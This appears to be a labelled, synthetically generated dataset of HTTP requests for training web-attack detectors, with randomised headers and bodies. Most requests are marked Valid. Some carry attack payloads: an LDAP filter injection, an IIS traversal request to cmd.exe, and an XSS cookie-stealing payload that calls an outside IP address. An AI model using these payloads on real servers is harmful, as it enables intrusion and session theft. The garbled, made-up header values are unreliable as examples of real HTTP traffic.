Expires: Sat, 29 Dec 07 08:55:26 GMT
Last-Modified: Mon, 16 Jun 08 19:24:02 GMT
Host: www.eAemrbyscl.de:80
Connection: keep-alive
Accept: video/*;q=0.5, video/*, image/png;q=0.6
Accept-Charset: cp-950;q=0.1
Accept-Encoding: 
Accept-Language: T-rye, ncehu-MTz
Cache-Control: no-store
Client-ip: 212.156.70.240
Cookie: KDxD5QQItmpmna=08949;gxtgno=y\c
Cookie2: $Version="14"
Date: Wed, 10 Jan 07 06:09:00 UTC
ETag: "vYqCg6krYQGgc4Tws38"
Expect: 100-continue
From: Eeho@ohodxite.cz
If-Modified-Since: Sat, 15 Oct 05 03:27:08 UTC
If-Unmodified-Since: Tue, 16 Dec 08 02:23:22 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Nov 08 24:26:45 UTC
Max-Forwards: 9033
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic MWxlbTpkdm9T
Authorization: ea2omu teZoSENi=rizrc
Range: 2283-08,769-296466,942-
Referer: http://www.izme.uk/Oretdh/Hiic2nhn/ino1rtrs.cgi
TE: chunked,trailers,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/7.2 (Machintosh; U; PPC 8.8; eg-iE; rv:7.0.8) Gecko/64874429
UA-CPU: x86
UA-Disp: 460,8217,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: FTP/0.1 206.17.6.31, 4.6 www.osgzit.htm, 2.3 29.152.15.62
Transfer-Encoding: gzip
Upgrade: aitr/2.7
Warning: 563 www.ssegmi.jpg:0959 "eA0hiutfptspi" 
X-Forwarded-For: 45.36.94.83
X-Serial-Number: 0421946796861302632
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t0tAs1senAjtf=Netmp n&AaelyzrKS1=eTrw6rng&0nhnc5dchere7CA=etre&PcmdyVi_Jexech=3174&a38ht5==esphpOhtaccesMbtecaq&dFlck=8805

End - Id: 33151
Start - Id: 9588
class: Valid
GET /SMgisv/olre09kn/oogttnN3tvsariex/oO9aW/lmEizdn1iuxjrdd1/graNJExS@5gfHOI/neqdnmosoddgbttomo/4jiizsOH.pl? HTTP/1.1
Host: 200.44.171.242
Connection: close
Accept: audio/*, application/zip;q=0.5, application/*
Accept-Charset: iso-8859-4, windows-1252, us-ascii, x-mac-icelandic;q=0.7, windows-1251;q=0.7
Accept-Encoding: deflate, identity;q=0.2, deflate
Accept-Language: Od-e64cM, Bdnet-e9nwnzA, eztmtthy-wa
Cache-Control: only-if-cached
Client-ip: 123.189.18.103
Cookie: ahlmso6s=atzntutiOu dtt$;sRw0cvbnhoAed=ymbcnetcatt dhClnbtlacei
Cookie2: $Version="085"
Date: Thu, 17 Jan 08 14:54:05 UTC
ETag: W/"fGkgUkCH6b5QEv-"
Expect: 100-continue
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Sun, 15 Jul 07 17:43:22 CET
If-Match: *
If-None-Match: "3_sf3fa8DMb2IqCl"
If-Range: Fri, 11 Jan 08 08:22:22 CET
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM RnRtb3NpRDFlMG5lbkFwZG9zYWdybDBzYWVzbmF0eWdz
Range: 60-,-239
Referer: http://www.lliai.fr/doicnt.gif
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (X11; U; Solaris 6.7; mo-nm; rv:1.4.1) Gecko/80922978
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7883x011
Via: HTTP/2.2 164.82.132.76, 3.2 www.tctEh.jpeg, 0.9 www.w1tocJe.gif
Transfer-Encoding: compress
Upgrade: aooeh/2.6
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 199.4.112.189
X-Serial-Number: 1202547378477429523
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9588
Start - Id: 5488
class: Valid
POST /sCMOI_UBMKwxvqxsSC/1o7gfdIf.zrxUs2rPP/tawd5Smno.php3? HTTP/1.1
Content-Length: 107
Content-Language: 7et,o
Content-Encoding: deflate
Content-Location: /LsbabEe/usgaij/sM6e5/neargonf.php3
Content-MD5: RTZlcmlpZzFvYXVlZUxzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Jan 05 02:09:49 GMT
Last-Modified: Sat, 18 Aug 07 23:48:52 GMT
Host: www.ohDtre1I.com
Connection: close
Accept: video/*, text/plain
Accept-Charset: windows-874;q=0.9, iso-8859-6;q=0.8, iso-8859-6;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=958
Client-ip: 55.210.233.217
Cookie: mfn=n/wgete0anctcis1 icTaz>e
Cookie2: $Version="8"
Date: Tue, 02 Mar 10 19:09:18 UTC
ETag: "77PNMkyNpKkNBeXH"
Expect: dm7lh
From: a2re@neunel.uk
If-Modified-Since: Thu, 28 Sep 06 11:53:31 UTC
If-Unmodified-Since: Mon, 02 Feb 04 23:02:09 GMT
If-Match: "q5c0b8s7m-vdMnowmRa"
If-None-Match: *
If-Range: ".rNpVpNexcqCteZ6d"
Max-Forwards: 81
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: cegiae nhwor=tnnO4
Authorization: jtwher eUdj=6Eteyot
Range: 20-882916
Referer: /oxih.cfm
TE: trailers
Trailer: If-None-Match
User-Agent: 3oyb5nAmon/5.8
UA-CPU: 68000
UA-Disp: 4823,2898,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 154x121
Via: 3.0 153.36.207.30, HTTP/1.7 www.otnsss.gif, 9.6 209.90.247.247
Transfer-Encoding: compress
Upgrade: 7le/3.6, 8ss/3.8, jc8srs/9.3, rmha/3.0
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 5440526
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

m7eeebheOs=7&iNlusz=eye&1Pe5oasjArsT=Hq&uhfZitehpteje=2687&zoqne6siEapMpab=522&h4henroV=dQ7obh7YC467&ait=17

End - Id: 5488
Start - Id: 31197
class: Valid
GET /cWQ_id0B.w-7L.jpeg?rgntperhuwsoc=1258&stohh6i4=34&mnrahlxisin=0644 HTTP/1.1
Host: www.myht.net:66896
Connection: close
Accept: image/gif, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 203.218.237.207
Cookie: ttaeSon8s=o7ssiaPkoypnpd;ii6oznsneQtt5ea=0;ZLyEM8d=6;C66yNZ=415265967
Cookie2: $Version="19"
Date: Wed, 18 Apr 07 23:08:23 GMT
ETag: "a..-DSc4OuWYd_X"
Expect: 100-continue
From: htelogv@hahUen.st
If-Modified-Since: Sun, 11 Jan 09 23:04:10 UTC
If-Unmodified-Since: Thu, 21 Jan 10 03:27:03 UTC
If-Match: "4@07881kfZbFRFoDuL8"
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.9
Pragma: JidenT='qhp630n'
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: Basic aTNsRDJ0ZTo0b3R5
Range: 487-253698,1-,198-1
Referer: /el7n.mpg
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/8.7 (X11; U; Unix 1.6; 8t-8q; rv:4.2.6) Gecko/50513415
UA-CPU: x86
UA-Disp: 001,876,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3376x378
Via: 6.2 178.119.49.250, 6.8 64.10.138.251:403
Transfer-Encoding: compress
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 967 9.3.197.185 "stmf" 
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 06672933371501212247
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31197
Start - Id: 20583
class: Valid
GET /aNWPLp6bn2bwlGCUNvsz/tQXchildagdelete.veQ/ia/ozoh6dfzmNgvnkebgshx/ei4nihoHt0ygfee1/iemowiooaA4/oho0IPswunzwF@WdM__q/tt5ereeEtgpeLgWin/egnndu/aGUFU24/mjeEe/-okGy.js? HTTP/1.0
Host: www.mEag.uk
Connection: cfxnvr
Accept: text/html;q=0.0
Accept-Charset: iso-8859-2, iso-8859-4;q=0.5, iso-8859-2;q=0.1, big5;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: t2ndu2-E, obNinpe-eewakem;q=0.7, 8iGaal0-eomea, 6frdH-he9;q=0.1
Cache-Control: no-transform
Client-ip: 18.150.17.27
Cookie: olmhto8uo8EceeX=gotantebnhm nSa[Ovsc;jeeriF= ;sSeeazeMoeiP=8t8nFdeaotUr;t5jToig=0;vmt9h= >;andm=267
Cookie2: $Version="5"
Date: Sun, 28 Nov 04 12:58:57 GMT
ETag: "keyCfyCCsast7x0tuN"
Expect: eeotP
From: er9oa@3ehh.fr
If-Modified-Since: Sat, 23 Jun 07 01:42:22 GMT
If-Unmodified-Since: Fri, 27 Jul 07 23:30:33 UTC
If-Match: *
If-None-Match: "tL1sfm6-iTxjSKjK"
If-Range: Sat, 23 Oct 04 07:27:41 UTC
Max-Forwards: 6532
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM ZGlpZWtlaWFhdG5vbHJpaWU3dHNxc2xkNGVhd210Z0VpZmlzYWV3dHd1bm5u
Authorization: NTLM OGVhRWJ6THJtdGVzYW5kZlVhcmZiZmRsa2JvbGloYXBsQzhuZWVlcmR1dzc=
Range: 1-99
Referer: /anevS/ctumo/hbman/oihlhnit.css
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: xd1i4t
UA-CPU: StrongARM
UA-Disp: 265,2929,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1074x5578
Via: FTP/3.1 227.139.34.83:035
Transfer-Encoding: hurSiO; tebuetj=ansp
Upgrade: 1bh2nl/0.8, aHt/2.8
Warning: 085 www.nNmehRA.gif "mrtsh7o" "Wed, 07 Feb 07 15:55:05 GMT"
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 999844116491308
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20583
Start - Id: 38061
class: LdapInjection
GET /neanh/tqmajSJK@p/eoesksodi0re5esB4u/tF9Hy./iitert/sAxDlqfdp-aKl9/jsydyy9oweseisrxn3e/igiQZS6MAVtw/z94D.jsp?Ddpieielceow1s=6083327650&ywso0snwHhhH8=ywIifodemif52ggeR&AaEdod=zFsG2SMw-&tnIeedob=dOs3V3sZyxzy&HIXjOBexecEH=iyosi%29isy%7Cte+popennEkt&cLI7e5lrre=m1a0%29%28%26%28objectClass++%3D++++s0as*%29&sxbnrssjsi=oPgg HTTP/1.0
Host: 75.58.221.252
Connection: rtft
Accept: text/*, video/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: slo-ursUIp
Cache-Control: only-if-cached
Client-ip: 193.128.109.55
Cookie: eDaob1sllzscnn=6118333292;iekcew=aCyYJEBq@utV
Cookie2: $Version="7"
Date: Sun, 22 Jul 07 17:53:55 CET
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 15 Oct 04 05:28:21 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: *
If-None-Match: "dRhld4vrKTdcaG5u90O"
If-Range: Tue, 13 Sep 05 12:59:27 UTC
Max-Forwards: 912
MIME-Version: 7.3
Pragma: robMf='esns'
Proxy-Authorization: Digest cnonce="iHtefan"
Authorization: Digest realm
Range: 8895-,04-
Referer: /4iri2tln/grarmoud/5terdode.avi
TE: gzip;q=0.2
Trailer: Authorization
User-Agent: tWaQ@wY http://www.chni.ch
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: 8.2 32.42.123.12:6031, FTP/6.7 116.101.17.26:63, 2ha/1.9 www.ist6enno.png
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38061
Start - Id: 30334
class: Valid
GET /My3c5systemB0pU/Nidmesuiiisr/m61rlcestsubvnat/iNN-kvCl6vax@i.kZ/.QfwJzusrt.PJEPq/dylnrydbjqantio/aenooaetnT7hsdo/n_tnLbBg.jsp? HTTP/1.0
Host: 17.185.174.199
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1255;q=0.0, gb2312;q=0.3, x-mac-chinesesimp, iso-8859-4;q=0.6, euc-cn
Accept-Encoding: compress
Accept-Language: ih-augoaKu, nH-vt5n;q=0.3, eetevegr-a3heAfm;q=0.0
Cache-Control: min-fresh=4
Client-ip: 1.141.100.207
Cookie: pbescbn7enad=iraoeipoo44EocWe;H_AwEt=Tprocessing-instruction ;sufcsreu3dlauou=xisFl;idrdirrnoesMhn=u
Cookie2: $Version="89"
Date: Wed, 04 Aug 04 16:53:14 UTC
ETag: W/"jDHpTDCFTQpT@SYMKl"
Expect: ehsaEtrk=7enp
From: hfr0t@7ilahls.gov
If-Modified-Since: Thu, 23 Jun 05 16:14:21 CET
If-Unmodified-Since: Mon, 04 May 09 04:22:51 GMT
If-Match: "EFm11027yVhPjYj"
If-None-Match: "HgVfZ8lCJgFvr2ZRZ"
If-Range: *
Max-Forwards: 40
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM ZGVoZnJBaUFvYWJlZGVmYXJkbmFzb3RpN3Z0ZGg0ZWlGeHlmYkJhUg==
Authorization: Digest opaque="rbacloea"
Range: 05745-,56-61
Referer: http://eoc5vaZ.biz/necr/oesoeb.mdb
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 0.0; eq-ae; rv:3.9.7) Gecko/38027968
UA-CPU: MIPS
UA-Disp: 2673,3726,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 418x868
Via: FTP/3.1 97.103.216.198, HTTP/2.7 www.noitftt5.jpg:97, FTP/1.0 www.nfwne.js
Transfer-Encoding: gzip
Upgrade: tx2uo/1.4, Ooo8x/2.1
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 116.208.83.67
X-Serial-Number: 2108310
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30334
Start - Id: 22058
class: Valid
GET /ttekneotshaeDlrqnttq/ml_H4YUFwWNe2UJo/RD-Xjlocationqk01/Fbn9kFoiK/aYballgo/lpes2ttnU31cN/wX.tiff?ciysn9LiYwihsa=elgna&s7outH=edR&orteMwdsclhhRq5=5jtqprbgs%3D72+je6jid&pjeO7sdVEmaan0=diN&rlaotm1obik2e=r4fp_Dy.&ZelVJQ7CGchildN=e%3D&kctob3aeos=3M.SXdszi7ze&fotIs03-Fm5=oZ_qtNCRvPo&lbstBaonia7n=h&eg=507313&pfsYne9Rkh=tuaobyfuhi&F4oah=n7sottskth6o&apn6tma7wyehomh=056806&os1szstbeotO5sh=315472414 HTTP/1.1
Host: www.rt0E.cz:0603
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, x-mac-roman;q=0.4, cp-936;q=0.2, x-mac-arabic, utf-7
Accept-Encoding: identity, deflate, deflate, identity
Accept-Language: *
Cache-Control: max-stale=7627
Client-ip: 248.80.181.232
Cookie: laoa0niu46tahe=955;teOhyeISc=281436
Cookie2: $Version="469"
Date: Mon, 28 Feb 05 24:49:34 CET
ETag: W/"7Nk8mMdpksNF4gCc79W"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Wed, 26 Aug 09 01:01:54 CET
If-Unmodified-Since: Thu, 31 Aug 06 14:04:29 GMT
If-Match: "cNLLVmUJbiu9CTD80S"
If-None-Match: "A8atJaffcqkqMoWWS"
If-Range: Wed, 23 Dec 09 24:48:25 UTC
Max-Forwards: 2
MIME-Version: 0.3
Pragma: 1ht='cgepieno'
Proxy-Authorization: NTLM NmdkZURlYmZoZW90emdNdHpkcmVmN3NoaWhzeWlvdHJ0
Authorization: 4lnt e5a6=tC1aei
Range: 5-448267
Referer: /oCdfo.sh
TE: trailers,deflate,gzip
Trailer: TE
User-Agent: Mozilla/7.9 (X11; U; Solaris 2.6; vd-rb; rv:5.1.6) Gecko/88275389
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4071x1172
Via: FTP/5.1 www.iei5dl.htm, lge/1.4 www.mthef.png
Transfer-Encoding: identity
Upgrade: ewHj/5.7
Warning: 377 253.201.21.135 "5jiuaat" "Mon, 24 Dec 07 17:02:15 GMT"
X-Forwarded-For: 30.171.197.154
X-Serial-Number: 10148622161169
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22058
Start - Id: 44222
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.3edausag.gov
Connection: close
Accept: application/*
Accept-Charset: euc-cn, euc-jp;q=0.8, euc-jp, iso-10646-ucs-2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 224.86.31.255
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="781"
Date: Mon, 16 Jan 06 12:52:01 UTC
ETag: W/"rXMGHgqjxj.t68uw@Vdp"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Fri, 20 Mar 09 03:34:05 UTC
If-Match: "Vhs8BA2QJi7B.Mrp9rW"
If-None-Match: "SXp9m8A9eXa9yfR"
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: NTLM TW90b2V6UGVzbzRlbjR0a2xnamluZWJlaWVpeXNwNWFnZWlkcw==
Range: 09660-850419
Referer: /oays2u/reoel/9irEsra.css
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: uChtmglenda
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.3 www.apL7ee.shtml:97, 8.2 www.suDis.shtml
Transfer-Encoding: eioon; ioTauWiM=aiit3ka
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44222
Start - Id: 5136
class: Valid
POST /lZZFvewOt9mScMFPRW_A/eQ/ddn3licnecsiiu4r/lVR/gPEwVSM7Soib/lriD.htm? HTTP/1.1
Content-Length: 84
Content-Language: hd,sRh
Content-Encoding: identity
Content-Location: http://ma5Uh.be/e3rEwena.php3
Content-MD5: dGVtZW5ocmFkdHNreE1ybg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 04 19:02:53 CET
Last-Modified: Sat, 01 Mar 08 05:56:38 GMT
Host: www.tnnbtoaDet.ch:80
Connection: close
Accept: application/x-tar;q=0.7, audio/*, image/png;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iiats-T, ilsbAms1-gltmdi;q=0.2
Cache-Control: max-stale=7
Client-ip: 167.58.57.131
Cookie: leegtsaEtsdvowo=93tis/lsWninputsCyiorm;ctremMfuxowM2=238
Cookie2: $Version="190"
Date: Fri, 16 Mar 07 02:41:33 GMT
ETag: "8E82KKTK9E5YqyL"
Expect: 100-continue
From: daodwiso@rGHdclsrni.org
If-Modified-Since: Wed, 16 Jan 08 22:22:37 CET
If-Unmodified-Since: Sun, 29 Jan 06 10:09:08 CET
If-Match: "v3btyJVKqzEqaBX"
If-None-Match: "DfgDudzTfghhMxeLR"
If-Range: *
Max-Forwards: 6439
MIME-Version: 8.5
Pragma: aeSalho=jea2ry0S
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: Basic dnRlb2VpYTpncGdyeW9n
Range: -00275
Referer: /dt5aswz/aby8ee/drnlkhM/Cr8tyxuc/7u8syn.gif
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (X11; U; Solaris 4.8; 0d-to; rv:6.8.7) Gecko/09485955
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6026x4919
Via: osno/0.4 www.ataNrl.js, olO7or/1.0 197.133.38.56, 5.5 www.2sobhhar.css
Transfer-Encoding: compress
Upgrade: pnpc/1.3, oTfn/4.8
Warning: 224 227.126.233.183 "ehAds4enRxnay" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neet4t=ymmrl'dsNcpositioniT8 e&hiiiaO=peee sm:la&-5evaloby&sacokir=2VccIeT8Dv9

End - Id: 5136
Start - Id: 33953
class: Valid
PUT /uS11Yb/o@4gZ0KW.cgi? HTTP/1.1
Content-Length: 66
Content-Language: tki5eqnh,4sars,l9bit
Content-Encoding: identity
Content-Location: http://www.hHrea.uk/iesjfI.rar
Content-MD5: cmdlRm85ZWdkaG90aHg0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Jun 08 14:28:48 GMT
Last-Modified: Mon, 17 Oct 05 14:44:33 GMT
Host: www.yenafnlou.com:3
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1252, iso-8859-7;q=0.7, utf-7, iso-8859-5;q=0.6, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: 3gfinnj-Eo, zrittd-8diw1f;q=0.3, thEh-L, tsHTla-t8hiosdw;q=0.9
Cache-Control: min-fresh=9
Client-ip: 52.137.8.76
Cookie: LdtfyejArErgXi=8;nOnLnpinelwth=yj8bz;wgpnot3fd=2950810142;eistpQao3Ot=scswtweseso;n1ey0rneaescue=aoeshYgiih
Cookie2: $Version="333"
Date: Fri, 02 Nov 07 18:32:21 CET
ETag: "Qw1Qzb19GM3KbbZzq"
Expect: 100-continue
From: eobeo@7uuevefn.cz
If-Modified-Since: Sat, 05 Nov 05 14:01:20 UTC
If-Unmodified-Since: Sun, 11 Mar 07 20:45:32 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Dec 06 11:20:30 UTC
Max-Forwards: 74
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic bEFpazoxZWFpZHNz
Authorization: Digest realm
Range: 50468-961,8583-3
Referer: http://www.mftseeb.net/rtUpf/l7bgfte.htm
TE: gzip;q=0.2,gzip
Trailer: Via
User-Agent: yasgr (odvfK7; kR80Jvy@W)
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 236x087
Via: HTTP/7.2 www.eooqi7vl.css
Transfer-Encoding: compress
Upgrade: qieelu/3.4, EqncM/6.9, btrA/6.0, idP/4.3, Owse/7.1
Warning: 808 www.a11otqpd.js "ieErLxrlK" "Tue, 21 Oct 08 21:39:20 CET"
X-Forwarded-For: 151.46.94.105
X-Serial-Number: 33317815178377
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

YzPmail=74309158&xio4ogueao8ez=abrQLTyNk27C&an=ss68aGL5r7&bns7a2=d

End - Id: 33953
Start - Id: 31782
class: Valid
GET /metawget/7P0dr0S.R25M73@L/2noscriptydbinY7c/utsq4Onth7.png?nxyoaf=4667 HTTP/1.0
Host: 186.47.152.179
Connection: t0leaa
Accept: video/quicktime;q=0.1, text/plain;q=0.7
Accept-Charset: iso-8859-15;q=0.9, x-mac-icelandic, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=2
Client-ip: 45.140.255.145
Cookie: rna=19368;qposwntil6oG=a4tabiac0S;llge1rhE469isp=1td3CNs
Cookie2: $Version="6"
Date: Thu, 16 Dec 04 14:44:37 GMT
ETag: "wQiWX@C2374Hy9I"
Expect: 100-continue
From: o58tOaQr@asxayh.com
If-Modified-Since: Tue, 18 Sep 07 18:05:01 GMT
If-Unmodified-Since: Tue, 14 Jul 09 17:34:02 CET
If-Match: "8YMSK8k4yG7tshd8@Ho"
If-None-Match: *
If-Range: "@Nrd06p@lnikgU-R3-SV"
Max-Forwards: 0690
MIME-Version: 6.8
Pragma: xa='dwnh'
Proxy-Authorization: yeau9 oohh=k6Ie
Authorization: NTLM b2FZNmF6SGJob2Vzc20yc1Rtc2dndHdhS2VzZHNhb0FkdmVzeTZuZmF6
Range: 1512-
Referer: http://www.hoegtNs.st/3dtdy/tnyhp.php3
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: iSRaxnG8 http://www.otpM.gov
UA-CPU: 68000
UA-Disp: 423,7753,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7261x084
Via: 8.0 252.46.30.104
Transfer-Encoding: deflate
Upgrade: esydDt/5.2, eehi/1.6
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 99.24.216.147
X-Serial-Number: 995299594
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31782
Start - Id: 46647
class: XSS
GET /89@e/ormodCaase/dteteabhxoMsagNntn/irQwsLLtncerGc4xos/smWVCdKurO9PD2.Ak7.gif?1o=swinntaad9Eto&ktFstqeordhma3r=%2Fosshz&-UwR=rbbqgg&whavingwKniLawI-M=a4&nbr=6298&txaui=41301243&Spnztetgmo=029795&ps0esM=9589&nbrinnWr=6995773663&rezpt2nt=iZddoSXs HTTP/1.1
Host: 244.227.238.218
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: <body    onload    =    "[window.open('http://220.126.91.61/rolend.aspx'+document.cookie);]  " >
Accept-Language: Eno4ipse-qxscr;q=0.3, 9t-ndaebnto;q=0.2, ise-cjiii9i;q=0.8, gKrija-reeagPsi, c-mem;q=0.4
Cache-Control: max-age=57
Client-ip: 51.95.35.51
Cookie: itrr=al.Jvn;haoohoeOvadmi=7vb7A9hTMQGN
Cookie2: $Version="7"
Date: Mon, 18 Aug 08 08:25:36 UTC
ETag: "nwx9cYxndsF-ju6P"
Expect: tthoc=chwaPia;laaeix
From: taeee@rooPt9.cz
If-Modified-Since: Fri, 26 Mar 10 15:34:03 UTC
If-Unmodified-Since: Fri, 21 May 04 09:19:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9871
MIME-Version: 1.7
Pragma: soNuo='fyfsEcy'
Proxy-Authorization: Basic ZmF1ZWhyQzplZW1zMmNp
Authorization: utoh iutTo=r6hr
Referer: http://www.sIamee.fr/Ooob/erreui.gz
TE: trailers
Trailer: Host
User-Agent: tgaaTfe/4.9.3
UA-Color: color8
UA-Pixels: 453x024
Via: 4.7 www.lRtr.jpg, szkei/1.6 43.201.4.181, 6.5 www.bylhn.jpg
Transfer-Encoding: identity
Upgrade: tteuU/7.4, wwqwE/2.1, 0ntoi/1.6, teva/9.5, i2imw7/0.1
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46647
Start - Id: 16734
class: Valid
GET /h2FSVOQRR5utJLR/d71asLeEog/worsf0rtno0ues/rzwksytxj3Y4CL/T-jOBorW6McJ69/6jeor7oemo/a5ouiln/l3OVemocha00.swf? HTTP/1.1
Host: www.tictpr.fr:80
Connection: pcuadEl
Accept: */*
Accept-Charset: shift_jis, x-mac-ce, windows-1253, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 107.56.49.177
Cookie: 2OteAanseata=16604618;dKXM=ocee;szzihyy9ct=Eeh6e1etzEans
Cookie2: $Version="75"
Date: Sat, 13 Sep 08 17:36:57 GMT
ETag: "PKL-3Ymhj7vA_z3nW"
Expect: 100-continue
From: j9obsh@tsaam9a.fr
If-Modified-Since: Fri, 12 Mar 04 10:20:00 GMT
If-Unmodified-Since: Tue, 13 May 08 04:52:03 CET
If-Match: "8E9eHUOLE_9X_UvWBZnW"
If-None-Match: *
If-Range: Sun, 24 Apr 05 24:34:41 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: cE2oew=etorr8f
Proxy-Authorization: Basic cmVEYmllajpIYWVkNGFpZA==
Authorization: NTLM ZnZtMmR0cmRjaWllZXRhaWR0ZHd1YzBldHRsZXRyNWRlVDJwYmhpNA==
Range: 4-,-5,062040-983
Referer: /i1XYz/sedml/nnjlebs/rdahNo.css
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/5.9 (compatible; Konqueror/8.7; Win98; ledhwoi)
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1249x2317
Via: HTTP/3.1 www.nn5hmew.html
Transfer-Encoding: identity
